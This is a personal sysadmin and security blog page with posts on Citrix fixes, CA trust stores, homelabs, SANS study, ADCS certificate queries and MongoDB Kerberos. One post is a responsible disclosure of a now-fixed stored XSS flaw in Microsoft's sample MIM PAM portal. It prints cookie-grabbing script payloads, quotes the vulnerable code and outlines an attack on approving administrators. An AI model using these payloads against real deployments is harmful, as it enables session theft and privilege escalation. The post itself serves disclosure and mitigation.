kilala.nl tags: , , ,

View or add comments (curr. 0)

Solved: Citrix Receiver - Cannot create connection file CitrixID

2019-03-24 14:12:00

Error message and creation

Earlier this week I had a need to use Citrix Receiver on MacOS, to connect to a remote desktop environment. That's a pretty normal use-case :) Unfortunately it kept throwing me an error: "Cannot create connection file CitrixID". 

Looking around the web it seems that plenty of people run into this issue, with plenty of hokey "fixes" going around. None of them got to the root of the issue. But here you are: the root cause!

When installing Citrix Receiver, the installation script uses your admin-rights to run a few commands using the actual root-account. Kind of yucky, but not very abnormal. The problem is that the script also creates configuration directories in your personal home directory. For example in "/Users/tess/Library/Application Support/Citrix Receiver". As you can see from the screenshot above, these directories and files are assigned root ownership, meaning that your normal user account cannot access or overwrite these files. 

The solution consists of either A) changing the ownership to your account and group, or B) just hard-removing these directories and re-creating them. Option A is neater and either requires use of the Terminal (sudo chown -R tess:tess "/Users/tess/Library/Application Support/Citrix Receiver"), or you can use the directory's Info-view and change the permissions from there. 
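Spelled out for the terminal, the two options look roughly like this; it's a sketch, so adjust the path and account to your own situation:

  # option A: take back ownership of the Citrix config directory
  sudo chown -R "$(whoami):$(id -gn)" "$HOME/Library/Application Support/Citrix Receiver"

  # option B: remove the root-owned directory and re-create it as your own user
  sudo rm -rf "$HOME/Library/Application Support/Citrix Receiver"
  mkdir -p "$HOME/Library/Application Support/Citrix Receiver"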


kilala.nl tags: ,

View or add comments (curr. 0)

Adding your own, trusted CA certificates in RedHat and Debian derivatives

2019-03-12 20:02:00

The past week I've gotten my start in an Ansible course and a book, starting my work towards RedHat's EX407 Ansible exam. I've been wanting to get a start in Ansible, after learning a lot about Puppet a few years back. And if I manage to pass EX407 it'll renew my previous RedHat certs, which is great. 

Anywho! The online course has its own lab environment, but I'm also applying all that I learn to my homelab. So far Ansible managed the NTP settings, local breakglass accounts and some systems hardening. Next stop was to ensure that my internal PKI's certificates get added to the trust stores of my Linux hosts. I've done this before on RedHat derivatives (CentOS, Fedora, etc), but hadn't done the trick on Debian-alikes (Ubuntu, Kali, etc) yet. 

First stop, this great blog post by Confirm IT Solutions. They've provided an example Ansible playbook for doing exactly what I want to do. :) I've taken their example and I'm now refactoring it into an Ansible role, which will also work for Kali (which unfortunately has unwieldy ansible_os_family and ansible_distribution values).

To summarize the differences between the two distributions:

RedHat expects: the CA certificate (in PEM format) dropped into /etc/pki/ca-trust/source/anchors/, after which you run update-ca-trust extract.

Debian expects: the CA certificate with a .crt extension dropped into /usr/local/share/ca-certificates/, after which you run update-ca-certificates.
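For reference, the manual equivalent that the playbook (and my role) automates looks roughly like this; the certificate filenames are hypothetical:

  # RedHat family: drop the PEM cert into the anchors directory and rebuild the trust store
  sudo cp myca.pem /etc/pki/ca-trust/source/anchors/
  sudo update-ca-trust extract

  # Debian family: the .crt extension is mandatory, then regenerate the bundle
  sudo cp myca.crt /usr/local/share/ca-certificates/
  sudo update-ca-certificates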


kilala.nl tags: , ,

View or add comments (curr. 2)

IT testlabs (homelabs) for everyone

2019-03-02 07:29:00

This article was posted to my LinkedIn, here.

Not too long ago I was in a SANS course, about the Critical Security Controls. More than once our teacher Russell nudged us, suggesting that "you could be applying these to your home network as well!" which brought us to the subject of testlabs. "What would make a good testlab for us?" was something asked along the way.

To sum things up: it really doesn't have to be glamorous! As long as your lab helps you experiment and learn, it's a good lab for you! So here's a few quick reminders for IT folks who would like to get their feet wet in setting up their own labs. 

Many homelabs have humble beginnings: if you have some spare room on your PC or laptop, you're good to go! If you throw the free and open source VirtualBox software on there, you can get started running a small number of VMs right away. Want something more polished? Take a look at VMWare's or Parallels' offerings! Both offer prosumer solutions for the private environment that allow you to run a few VMs without incurring too much cost. And if you're already running Linux, there's always the fan-favorites KVM and Qemu.

So what do you put into that shiny, new lab of yours? Well, whatever you like of course! 

If there's a course or exam you're studying for, run the relevant software in your lab. Tinker with it. Mess with it. Break it and fix it. Then do some unexpected funny business with it. Enjoy yourself! 

Need to learn new software for work? Want to try a new programming language? Feeling nostalgic and want to run those old games from yesteryear? Throw it into your lab!

Then after a few years, you may start feeling cramped. There's only so many VMs you can run in the spare space of your day-to-day computer. What to do? What to do?! You can't exactly go out and buy some expensive, enterprise-grade hardware, can you? ... Or, could you? ;)

This is when you turn to resources like OpenHomeLab and /r/homelab. There are many ways of getting performant virtualization platforms for relatively little money. For example, if you feel spendy you could put together your own server hardware from a source like SuperMicro, or buy a new Intel NUC. The latter are tiny powerhouses that can be easily tucked away and which don't make a lot of noise (spouse-friendly!). 

Want to be more frugal? Turn to one of the many hardware refurbishing companies in your area. Their whole purpose is to buy older enterprise equipment, clean it up and resell it to second-hand buyers. Do your research and you'll find some really great stuff out there.

With your newfound enterprise hardware it's also time to move to enterprise-level virtualization! Huzzah! New things to learn! And there are so many great choices! Windows Server comes with Hyper-V. Linux comes with KVM and Qemu. And there's always the tried-and-true (and FREE!) VMWare ESXi. Or if you're feeling daring, take a look at the awesome ProxMox

To illustrate the aforementioned, here's my own story:

To sum things up: just get stuck in! Start small and keep learning!


kilala.nl tags: ,

View or add comments (curr. 0)

Network segmentation in the homelab

2019-03-01 22:36:00

My network layout

Continuing where I left off a few weeks ago, I've redone the network design for my homelab. When we last looked at the network, it was all flat with all VMs tucked in a single subnet behind a pfSense router. Because I want to work towards implementing the CSC in my lab, I've moved everything about quite a lot.


kilala.nl tags: , ,

View or add comments (curr. 0)

GCCC certification achieved

2019-02-28 14:39:00

It's been two weeks since finishing my index of the SEC566 course materials. This morning, I took the GCCC certification exam and passed with a 93% score! Yay!

On to the next big thing: RedHat's EX407 Ansible exam :)


kilala.nl tags: ,

View or add comments (curr. 2)

Be a good netizen: enable SPF to prevent email spoofing for your domain

2019-02-25 09:57:00

Continuing with security improvements all site and domain admins can apply: everybody that runs their own domain can and should implement SPF (Sender Policy Framework).

What it does, is explicitly tell the whole Internet which email servers are allowed to send email on behalf of your domain(s). Like many similar advertisements, this is achieved through DNS records. You can handcraft one, but if things get a bit too complicated, you can also use the handy-dandy SPF Wizard.
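To give you an idea, a record for a domain that only sends mail from its MX hosts and one additional server could look like this; the values are purely illustrative:

  example.org.   IN   TXT   "v=spf1 mx ip4:192.0.2.10 -all"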


kilala.nl tags: , ,

View or add comments (curr. 0)

GIAC GCCC index and studying

2019-02-18 20:29:00

a stack of books

Ooofff!! I've spent the past three weeks building my personal index for the SANS SEC566 course books. It was quite a slog because the books are monotonous (twenty chapters with the exact same layout and structure), but I've made it through! 29 pages with 2030 keywords.

The index was built using the tried and true method made famous by Hacks4Pancakes and other InfoSec veterans.

Right after finishing the index I took my first practice exam and scored a 90%. That's a good start!


kilala.nl tags: , ,

View or add comments (curr. 2)

Microsoft MIM PAM Portal and PAM REST API cross-site vulnerability

2019-02-07 18:11:00

 

If the screenshot above looks familiar to you, you need to pay attention. (Image source)

 

XSS attack on Microsoft's PAM Portal

Microsoft's MIM is a widely used identity management platform for corporate environments. Many MIM tutorials, guides and books (including Microsoft's own site) [1][2][3] refer to Microsoft's sample PAM portal [4] to demonstrate how a request handling frontend could work. In this context, PAM stands for: "Privileged Access Management". While some of these sources make it clear that this is merely a demonstration, I can say without a doubt that there are companies that put this sample PAM portal to use in production environments. [5][6][7][8] Let me restate: there are enterprises putting the sample PAM Portal into production!

In short, the PAM portal allows an authenticated user to activate MIM "roles", which in turn will add groups to their account on-demand. By activating a role, MIM interacts with Active Directory and adds the groups configured for the role, to the end user's account. Unfortunately the sample PAM portal is not suited for production and I suspect that it has had little scrutiny with regards to the OWASP Top 10 vulnerabilities.

The cross-site scripting vulnerability that I ran into concerns the "Justification" field shown in the screenshot below. (Image source)

When activating a role, the end-user is presented with a popup asking for details of the request. The field labeled "justification" allows free entry of any text. It is not sanitized and the length appears to be limited to 400 characters. Through testing I have proven the ability to enter values such as:

<script>alert("Hello there, this is a popup.");</script>
<script>alert(document.cookie);</script>

 

These Javascript snippets are entered into the backend database without sanitation or conversion. The aforementioned 400-character limit is easily enough for instructions to download and run shellcode.

If we look at "Roles.js" on the Github page we see the following, where the form contents are loaded directly into a variable, without sanitation.

  $("form#createRequestForm").submit(function(e){
        var roleId = $("#roleIdInput").attr("value"); 
        var justification = $("#justificationInput").val();
        ... ...
        $.when(createPamRequest(justification,roleId,reqTTL,reqTime))
        ... ...

The "createPamRequest" function is defined in "pamRestApi.js", where yet again the input is not sanitized.

function createPamRequest(reqJustification, reqRoleId, reqTTL, reqTime) {
    var requestJson = { Justification: reqJustification, RoleId: reqRoleId, RequestedTTL: reqTTL, RequestedTime : reqTime };
    return $.ajax({
        url: BuildPamRestApiUrl('pamrequests'),
        type: 'POST',
        data: requestJson,
        xhrFields: {
            withCredentials: true
        }
    })
}

The XSS comes into play when browsing to the "Requests" (History) or the "Approvals" tabs of the sample PAM portal. These pages respectively show the user's own history of (de)activation and other user's requests that are pending approval. After entering the code snippets above, visiting the "History" tab results in two popups: one with the short message and another one blank, as there are no cookie contents.

 

Attack vectors

One viable attack vector would be:

  1. Attacker has access to a valid Active Directory account (either stolen or their own account).
  2. Attacker requests access to a role that requires approval from a privileged administrator.
  3. As justification, attacker enters Javascript or similar programming that includes shellcode.
  4. Privileged administrator visits the "Approvals" tab and the shellcode is run on their computer, using their privileges.
  5. The attacker has now gained access to the privileged administrator's computer with their credentials.

 

Root Cause for the cross-site scripting: MIM PAM REST API

The aforementioned sample PAM portal is a collection of Javascript bundles and functions, thrown together with some CSS and HTML. It has no database of its own, nor any data of its own. All of the contents are gathered from the MIM (Microsoft Identity Manager) database, through the MIM JSON REST API.

Based on the previously discussed vulnerability we can conclude that the MIM JSON REST API does not perform input validation or sanitation! At the very least not on the "Justification" field. The Javascript code I entered into the form was passed directly through the JSON API into the MIM database and was later pulled back from it (for the "Requests" and "Approvals" pages).

I have also verified this by delving directly into the database using SQL Management Studio. The relevant field in the database literally contains the user's input. There is no transcoding, no sanitation, etc.

 

Resolution by Microsoft

I reported these issues to Microsoft through their responsible disclosure program in December, right before the holidays. After investigating the matter internally, they have provided a fix to the sample PAM Portal. The January 2019 revision of the code is no longer susceptible to an XSS attack.

Microsoft's resolution consists of hardening the code of the PAM Portal itself: no data retrieved from the database will be interpreted as HTML. Instead, it is always treated as plain text. Refer to the Github pull request chat for details.

They have NOT adjusted the MIM PAM REST API, which will continue to accept and store any user input offered. This means that accessing the API through Invoke-WebRequest is still susceptible to an XSS attack, because I-WR will happily run any Javascript code found. I showed this with examples earlier this week.

 

Mitigation

Anyone using the Microsoft MIM PAM Portal in their network should upgrade to the latest version of the project as soon as possible.

Also, if you are using the Powershell command Invoke-WebRequest to access the MIM PAM REST API, you should always add the -UseBasicParsing flag.

 

Sources

  1. O'Reilly Microsoft Identity Manager
  2. TLK Tech Identity Thoughts
  3. Microsoft docs
  4. Sample PAM Portal
  5. Microsoft TechNet forums
  6. Microsoft TechNet forums (2)
  7. Microsoft TechNet forums (3)
  8. Just IDM

kilala.nl tags: , ,

View or add comments (curr. 0)

Surprise! Invoke-WebRequest runs Javascript

2019-02-04 13:45:00

Well! It's been an interesting month, between work and a few vulnerabilities that I'd reported to a vendor. And now there's this little surprise!

Imagine that you're using Powershell's Invoke-WebRequest command in your management scripts, to access an API or to pull in some data. It happens, right? Nothing out of the ordinary! While I was pentesting one particular API, I decided to poke at it manually using Invoke-WebRequest, only to be met with a surprising bonus! The Javascript code I'd sent to the API for an XSS-attack was returned as part of the reply by the API. Lo and behold! My I-WR ran the Javascript locally!

Screenshot 1 shows the server-side of my proof-of-concept: Python running a SimpleHTTPServer, serving up "testpage.html" from my laptop's MacOS.

In the image above you'll also see the Unix/Linux/MacOS version of curl, which simply pulls down the whole HTML file without parsing it.

Now, the image below shows what happens when you pull in the same page through Invoke-WebRequest in Powershell:

Fun times!
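If you want to reproduce the server side of this proof-of-concept yourself, it's trivial to set up. A minimal sketch; the page contents below are my reconstruction, not the exact test page from the screenshots:

# create a tiny page with an embedded script
cat > testpage.html <<'EOF'
<html><body>
<p>Hello from the test page.</p>
<script>alert("Surprise, I ran!");</script>
</body></html>
EOF

# serve it up; this is the Python 2 syntax, on Python 3 use "python3 -m http.server 8000"
python -m SimpleHTTPServer 8000

Pulling that page down with curl just prints the HTML; pulling it in with Invoke-WebRequest is what triggers the behaviour shown above.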

This means that every time you run a curl or Invoke-WebRequest on Windows, you'd better be darn sure about the pages you're calling! This Javascript alert is benign enough, but we all know the dangers of cross-site scripting attacks or just plain malevolent Javascript! Annoyingly, I have not yet found a way to disable JS-parsing in these commands. Looks like it can't be done.

What's worse: these commands are often included in scripts that are run using service accounts or by accounts with administrative privileges! That runs afoul of Critical Security Control #5: controlled use of administrative privileges! (More info here @Rapid7). Basically, you're running a whole web browser in your scripting and tooling!

So be careful out there folks! Think before you run scripts! Check before you call to URLs you're not familiar with! Trust, but verify!

EDIT: I've sent an email to Microsoft's security team, see what they think about all this. I mean, I'm sure it's a well-known and documented fact, but personally I'd feel a lot safer if I had the option to disable scripting (like JS) in Invoke-WebRequest.

EDIT: It looks like the only way to disable Javascript in Invoke-WebRequest, is to disable it in the Internet Explorer browser. Guess that makes sense, because doesn't I-WR use the IE engines?


Update and correction

After discussing the matter with the security team of Microsoft, I have come to understand that I have misunderstood the documentation provided for Invoke-WebRequest. It turns out that you can easily protect yourself from this particular problem by always adding the flag -UseBasicParsing.


kilala.nl tags: , ,

View or add comments (curr. 3)

Homebrew CMS security improvements

2019-02-02 21:07:00

Did you know that Mozilla offer a great resource called Observatory? This tool scans your website and provides you focused instructions on how to improve the basic security of your site. It'll help you prevent the most common causes for XSS, CSRF and more! With about an hour's work, I've taken my site from an F score to A+ :)

Now, it's been ages since I first started work on this website of mine. Can't properly recall when I first started, but it's been at least ten years since version 1.0. I will readily admit that I'm an utter, utter hack: self-taught, borrowing code left and right, just trying to get things to work. Along the way I've picked up security lessons, mostly on how to prevent SQLi and XSS. And now, thanks to Observatory I've learned more! 

Mozilla's web security guidelines document has been a great help! Until this week I'd never heard of HSTS or CSP, so I've taken time to improve my site's security posture. This included properly sourcing my own Javascript and diking out a lot of the JS I'd been sourcing externally (reCaptcha, Google Analytics, etc), just because they were dead weight to me. I had heard about SRI before through Troy Hunt's excellent article about Javascript supply chain security.
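To give an idea of the kind of response headers Observatory nudges you towards, here are a few generic examples; these are illustrative values, not my exact configuration:

  Strict-Transport-Security: max-age=63072000; includeSubDomains
  Content-Security-Policy: default-src 'self'
  X-Content-Type-Options: nosniff
  Referrer-Policy: strict-origin-when-cross-origin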

Anywho. It's been a learning experience! This little blog of mine ain't pretty, nor very exciting, but it's my little home and it makes a nice testbed to practice coding.

Some useful resources that helped me along:


kilala.nl tags: ,

View or add comments (curr. 0)

The (alleged) Ed Skoudis Plan For Success

2019-01-20 07:27:00

In our field we often learn that attribution is hard. In this case it amounts to no more than hearsay. So let's discuss the alleged Ed Skoudis Plan For Success(tm). On our last day at SEC566, our trainer Russell gave us some parting wisdom, among which was an anecdote. To paraphrase: 

I asked Ed, "Ed, how did you get this far in your career?" and he said "You know? Years and years back, I decided that every day I would take one to two hours for myself and study something new". And that's what I've been doing for the past ten years: every morning I get up at five, knowing I've got the house to myself for at least two hours. The first two days I spent catching up with email or reading infosec news. But then I thought, there's gotta be a better way to spend this time. So I set myself study goals.

This is a message I can get behind! Mostly because I've been doing the exact same thing for the past six years. ^_^

It's only missing one thing: direction.

Before 2010 I had some less-than-fun experiences with studying. My previous employer had a very rigid process for certification, requiring you to pass through a strict series of (what I considered to be very drab) certifications before allowing you to move on to the fun stuff. So I'd turned into someone who didn't enjoy studying: it was a "must" instead of a "want". 

Now, studying for my CISSP around that time changed things a bit! I spent weeks upon weeks working through that fat book, doing exercises and research, taking a bootcamp to earn that valued cert. And it was great! But then I turned into a CISSP slacker.

But things got better! Because in 2013 I had enough of it! I'm not a fscking slacker, I'm a professional! Sure, everybody has got their hangups, as do I. So I tackled them! I turned to my best friend and brother-from-another-mother Menno and asked him for coaching, the life-coaching kind. I'm very grateful for the help he offered me at the time. 

One of the things to come from those coaching sessions is direction. There we go! The missing ingredient! And the funny thing is that what's needed is already in the title of this post: a plan.

Make yourself a plan!

At the time I made a plan that would allow me the bare minimum to retain my CISSP status. That was the first hurdle to take, allowing me more freedom to move and breathe once it'd been taken. Well it worked! And instead of settling back into the slacking I'd done before I started setting myself goals and challenges in the form of certifications. It's not that I believe certifications to be the silver bullet to a great career, but setting them as a goal tends to provide focus: you have to study hard enough, with a certain deadline, to make the cut. 

Initially I consulted friends and colleagues to find which certs would provide value to my resumé, which led to the RHCSA and RHCE certs. And from there on, things just kept rolling and expanding! Classes left and right, webinars and videos from infosec conventions and more and more certifications. 

The most important things I've learned:

Without knowing it, I was following Ed's plan all this time. And it has brought me far. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

My experiences as SANS Facilitator (SEC566)

2019-01-17 19:27:00

EDIT:

Oooff... Linking to my homebrew website on a SANS Twitter-feed; how's that for #LivingDangerously? For the love of cookies, please don't hack me. I like my Dreamhost account... ^_^

 


 

About a month ago I explained a bit about the amazing chance I'd been offered by SANS, when they accepted me into their Work/Study Program. My week with SANS is coming to its end, so I thought I'd share a few of my experiences. Quite a few others have shared their stories in the past (linked below), but this is mine. :)

 

As was expected the days are pretty long and the work is hard. But for me they haven't been unbearably long, nor impossibly hard. Overall the atmosphere at SANS Amsterdam has been pretty laidback! 

Before coming to town, our event managers had set up a WhatsApp group so we could stay in close contact before and during the event. This turned out to be very helpful, as we could keep messaging each other during class through the magic of WA's webapp. You can count on silly memes flying through that chat, but it's been mostly useful :)

Sunday was spent moving and unpacking 250 boxes of books into the respective eight rooms. There's a rather specific layout that SANS want their student-tables to be in (books stacked exactly so-and-so, pen here w/ yellow cap there, logo pointing here and so on). As another Facilitator said: "Clearly someone has put a lot of thought into this...". I've found that, after putting the boxes on the ground in a circle around me, I got into the rhythm of making the stacks real quickly. Setting up the mics and speakers and rigging powerlines was a nice flashback to my days with AnimeCon.

Choosing not to stay at an Amsterdam hotel has been both a boon and a burden. Traveling home allows me to see my family every night and saves me quite some dough. It'll also take my head out of SANS a little bit, so I can unwind. On the other hand I'm missing out on the nightly sessions and NetWars.

Working with the SEC566 trainer Russell has been nothing but a pleasure. As he himself said, he's "pretty low maintenance". He doesn't need me to go around town to grab things for him, just make sure his water bottles are always available and that the room's ready for use. So instead, most of my time went to the rest of the party: cleaning the room, prepping for the next day and making sure that the other students are "in a good place". A few people were having issues with their lab VMs, some folks had questions about practical SANS matters and others were simply looking for a nice chat. 

Speaking of: I can honestly say that it's been a long while since I've spent time with such a friendly group of people! I know that some folks on the web have been complaining that the InfoSec industry has been toxifying in recent years, but at least we didn't notice anything 'bout that at SANS Amsterdam. I've met quite a few fun and interesting people here! 

In short: I am very grateful for the opportunity SANS have given me and I would recommend applying for the role to anyone in a heartbeat!

 


 

EDIT: Because some people have asked, here's my "normal" workday as Facilitator, traveling from home in Almere to Amsterdam.

 

During the lab exercises I usually work ahead, so I'm one chapter ahead of the class. That will allow me to know upfront what kind of problems they may run into and may need help with. As others on TechExams.net have pointed out, Facilitators are NOT the same as TAs (teaching assistants). So on the one hand I am constantly a bit anxious about whether or not I'm butting into the trainer's ground. On the other hand I've had good responses from both classmates and the trainer, so I reckon I didn't tick anyone off... At least not this time :D

I can imagine that it'd be entirely different in a tech-oriented class. I'd have to pipe down a lot more than I did this week. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Homelab: network segregation

2019-01-11 21:06:00

So far I've built a few VMs in my homelab, to house my AD DS and AD CS services (the Directory Services and PKI respectively). There's also a few CentOS 7 boxen spinning up to house Graylog and ElasticSearch.

Up until this point, all these VMs were getting their IP addresses from our home's internal network infrastructure. Of course it's always a bad idea to mix production and dev/test environments, so I've set up segregation between the two. The easiest way to achieve this will also help me achieve one of my goals for 2019: get acquainted with the pfSense platform.

pfSense is a BSD-based, open source platform for routers/firewalls that can be run both as a VM or on minimalistic ARM-hardware. In my case, I've done a setup comparable to Garrett Mills' example on Medium.com. In short:

  1. I have defined a new virtual switch in VMWare, tied to one of the unused NICs of the Dell R410 (a scripted alternative to steps 1 and 2 is sketched after this list).
  2. This new virtual switch ("LabLAN") is then tied to a newly created port group, also called "LabLAN".
  3. The pfSense VM is assigned two NICs: one tied to the default "VM Network" port group, which leads to the used NIC on the R410, and the other tied into the "LabLAN" port group.
  4. After installing pfSense, the "VM Network" NIC is indicated as the WAN-interface, with the "LabLAN" NIC being the LAN-interface.
  5. After running through the basic pfSense configuration, it mostly works out of the box!
  6. I've migrated all the VMs I'd made so far into the "LabLAN" port group, adjusting their IP configurations accordingly. 
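If you'd rather script steps 1 and 2 than click through the vSphere client, ESXi's esxcli can do it too. A rough sketch from memory, so double-check the option names against esxcli's built-in help; vmnic1 stands in for whatever your unused NIC is called:

  # create the isolated virtual switch and a matching port group
  esxcli network vswitch standard add --vswitch-name=LabLAN
  esxcli network vswitch standard portgroup add --portgroup-name=LabLAN --vswitch-name=LabLAN
  # tie the unused physical NIC to the new switch
  esxcli network vswitch standard uplink add --uplink-name=vmnic1 --vswitch-name=LabLAN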

BAM! The dev/test VMs are now tucked away into their pocket universe, invisible to our home network. 

EDIT:

The pfSense folks also provide nice documentation on setting up their product inside VMWare ESX.


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab

2019-01-10 21:47:00

(C) Dell

For the past X years, I've run my homelab on my Macbook Air. I've always been impressed with how much you can get away with, on this light portable, sporting an i5 and 8GB of RAM. It'll run two Win2012 VMs and a number of small Linux hosts, alongside the MacOS host.

But there's the urge for more! I've been playing with so much cool stuff over the years! I want to emulate a whole corporate environment for my studies and tests!

Like the OpenSOC folks, I've been eyeing those Skull Canyon Intel NUCs. They're so sexy! Tiny footprint, combined with great performance! But they're also quite expensive and they don't have proper storage on board. My colleague Martin put me on the trail of local refurbishers and last week I hit gold. 

Well... Fool's Gold, maybe. But still! It was shiny, it looked decent and the price was okay. I bought a refurbished Dell R410.

Quick specs:

Yes, it's pretty old already (generation 11 Dell hardware). Yes, it's power hungry. Yes, it's loud. But it was affordable and it's giving me a chance to work with enterprise hardware again, after being out of the server rooms for a long while. 

After receiving the pizza box and inspecting it for damage, the first order of business was to setup its iDRAC6. iDRAC is Dell's solution to what vendors like HP call ILO: a tiny bit of embedded hardware that can be used across the network to manage the whole server's hardware.

The iDRAC configuration was tackled swiftly and the web interface was available immediately. It took a bit of digging in Dell's documentation, but I learned how to flash the iDRAC6 firmware so I could upgrade it to the latest (2.95) version. It really was as easy as downloading the "monolithic" iDRAC firmware, extracting the .D6 file and uploading it through the iDRAC web interface. Actually finding the upload/update button in the interface took more effort :p

Getting the iDRAC6 remote console working took a little more research. For version 6 of the hardware, the remote console relies upon a Java application, which you can call by clicking a button in the web interface. What this does is download a JNLP configuration file, which in turn downloads the actual JAR file for execution. This is a process that doesn't work reliably on modern MacOS due to all the restrictions put on Java. The good news is that Github user Nicola ("XBB") provides instructions on how to reliably and quickly start the remote console for any iDRAC6 on MacOS, Linux and Windows. 

Last night I installed VMWare ESXi 6.5, which I've been told is the highest version that'll work on this box. No worries, it's good stuff! The installation worked well, installing onto a SanDisk Cruzer Fit mini USB-drive that's stuck into the front panel. I still have a lot of learning to do with VMWare :)

In the mean time, there's two VMs building and updating (Win2012 and CentOS7), so I can use them as the basis for my "corporate" environment. 

My plans for the near future:

I'm having so much fun! :D


kilala.nl tags: , ,

View or add comments (curr. 0)

I was accepted as SANS Facilitator!

2018-12-19 20:10:00

Great news everyone!

The excitement is palpable!

A number of past colleagues waxed lyrical about SANS trainings: in-depth, high-tech, wizardry, grueling pace and super-hard work! And at the same time one heck of a lot of fun! And I must admit that I've spent quite a few hours browsing their site, drooling at the courses and exams they offer. They certainly are a well known name in the InfoSec world, having a good reputation and being downright famous for their coin challenges and the high level of skill they both garner and require. 

Unfortunately I could never get past the steep bill! Yes, they're very good! But each course rings in around $6000! And their Netwars and exams don't come cheap either! So I just sighed and closed the tab, only to revisit months later. But this year things changed! Somewhere in September I learned something that I should've known before! I don't even remember whether I read about it on Reddit, on Tweakers or on TechExams, but it was a great find nonetheless!

SANS offer what they call the Work/Study Program. To quote their own site:

"The Work Study Program is a popular and competitive method of SANS training which allows a selected applicant the opportunity to attend a live training event as a facilitator at a highly discounted tuition rate. SANS facilitators are cheerful, friendly, and ever-ready professionals who are selected to assist SANS staff and instructors in conducting a positive learning environment. Advantages of the SANS Work Study Program include:

  • Attend and participate in a 4-6 day course
  • Receive related courseware materials
  • Work with Certified Instructors and SANS Staff
  • Attend applicable Vendor Lunch & Learns, SANS@Night, and other Special Events
  • Opportunities to network with security professionals
  • Free corresponding GIAC certification exam attempt [if available], when lodging onsite at the host hotel
  • Request early access to online OnDemand integrated slides and notes [if available]"

How great is that?! By helping out at the event and putting in a lot of hard work, you get a discount, plus a whole wad of extras to make sure you still get the full benefit of the training you signed up for! I decided then and there to apply for the role of Facilitator for the upcoming Amsterdam event, in January 2019.

I honestly did not think I stood much of a chance because, as SANS say, it's highly competitive and SANS often prefer past SANS-students or -facilitators and I am neither. On the upside, I do have a lot of organizational experience in running events, with many thanks to all those years of staffing and volunteering with AnimeCon.

I'd almost forgotten about my application, until a few weeks ago when the email above showed up! OMG! O_O I got accepted!

Now that all the paperwork has been settled I also have a better grasp of both my responsibilities and the perks I'll be receiving. I was assigned to SEC566 - Implementing and Auditing Critical Security Controls, a five-day course (the whole event actually lasts six days). My duties at the event are actually not dissimilar to gophering at AnimeCon! I'll be assisting the course's trainer, basically not leaving their side unless they need something from outside. I'll also be responsible for the security of the assigned classroom and will act as a sort-of guide and friendly face to the other students. Where "normal" students will have 0900-1700 days, mine will most likely be 0700-1900. That's gonna be tough! The Sunday before the event starts will also be a full workday, preparing the venue with all the cabling, networking, equipment and the book bags for students. 

And that discount we're getting? When I signed up I had not fully understood what SANS wrote on their site:

"The Work Study tuition fee is USD 1,500 or EUR 1,300 plus any VAT depending on the event location. Should you be selected to facilitate a Summit presentation, the fee is $250 or 217 per day plus any VAT for European events. International Tax/VAT will apply for certain events."

A €1300 discount sounded pretty darn good to me, when combined with all those bonuses! Turns out I misunderstood. The final fee is €1300! So on a total value of >$8100, they're discounting me €6800.  O_O

To say I'm stoked for SANS Amsterdam would be severely understating my situation! I am very grateful for being given this opportunity and I'm going to work my ass off! I'll make sure SANS won't regret having accepted me!


kilala.nl tags: ,

View or add comments (curr. 0)

Certificate life-cycle management with ADCS

2018-11-28 16:49:00

Following up on my previous post on querying ADCS with certutil, I spent an hour digging around ADCS some more with a colleague. We were looking for ways to make our lives easier when performing certificate life cycle management, i.e. figuring out which certs need replacing soon. 

Want to find all certs that expire before 0800 on January first 2022?

certutil -view -restrict "NotAfter<1/1/2022 08:00"

 

However, this also shows the revoked certificates, so let's focus on those that have the status "issued". Here's a list of the most interesting disposition values.
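(From memory, so do verify against your own CA's database, these are the disposition values I filter on most often, written as a small PowerShell lookup table:)

$DispositionCodes = @{
    9  = "Request is pending"
    20 = "Certificate issued (0x14, the one used below)"
    21 = "Certificate revoked"
    30 = "Request failed"
    31 = "Request denied"
}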

certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14"

 

Now that'll give us the full dump of those certs, so let's focus on just getting the relevant request IDs.

certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14" -out "RequestId"

 

Mind you, many certs can be set up to auto-enroll, which means we can automatically renew them through the ADCS GUI by going into Template Management and telling AD to tweak all currently registered holders, making them re-enroll. That's a neat trick!

Of course this leaves us with a wad of certificates that need manual replacement. It's easier to handle these on a per-template basis. To filter on these, we'll need to get the template ID. You can do this through the ADCS GUI, or you can query a known cert and output its cert template ID.

certutil -view -restrict "requestid=3162" -out certificatetemplate

 

So our query now becomes:

certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14,certificatetemplate=1.3.6.1.4.1.311.21.8.7200461.8477407.14696588202437.5899189.95.14580585.6404328" -out "RequestId"

 

Sure, the output isn't easily used in a script unless you add some output parsing (there are blank lines and all manner of cruft around the request IDs), but you get the picture. This will at least help you get a quick feeling for the amount of work you're up against. 
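If you do want to feed this into a script, a minimal parsing sketch could look like this. It assumes an English-language CA where each row prints something like "Request ID: 0x3b (59)"; adjust the match to your own output.

certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14" -out "RequestId" |
    Select-String "Request ID:" |
    ForEach-Object {
        # grab the decimal value between parentheses, e.g. "Request ID: 0x3b (59)" -> 59
        if ($_ -match '\((\d+)\)') { $matches[1] }
    }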


kilala.nl tags: , ,

View or add comments (curr. 0)

Kerberos authentication in MongoDB, with Active Directory

2018-11-22 19:35:00

I've been studying MongoDB recently, through the excellent Mongo University. I can heartily recommend their online courses! While not entirely self-paced, they allow you enough flexibility to finish each course within a certain timeframe. They combine video lectures with (ungraded) quizzes, graded labs and an exam. Good stuff!

I'm currently taking M310, the MongoDB Security course. One of the subjects covered is Kerberos authentication with MongoDB. In their lectures they show off a use-case with a Linux KDC, but I was more interested in copying the results with my Active Directory server. It took a little puzzling, a few good sources (linked below) and three hours of mucking with the final troubleshooting. But it works very nicely! 

 

On the Active Directory side:

 We'll have to make a normal user / service account first. I'll call it svc-mongo. This can easily be done in many ways; I used ADUC (AD Users and Computers).

Once svc-mongo exists, we'll connect it to a new Kerberos SPN: a Service Principal Name. This is how MongoDB will identify itself to Kerberos. We'll make the SPN, link it to svc-mongo and make the associated keytab (an authentication file, consider it the user's password) all in one blow:

ktpass /out m310.keytab /princ mongodb/database.m310.mongodb.university@CORP.BROEHAHA.NL /mapuser svc-mongo /crypto AES256-SHA1 /ptype KRB5_NT_PRINCIPAL /pass Password2

 

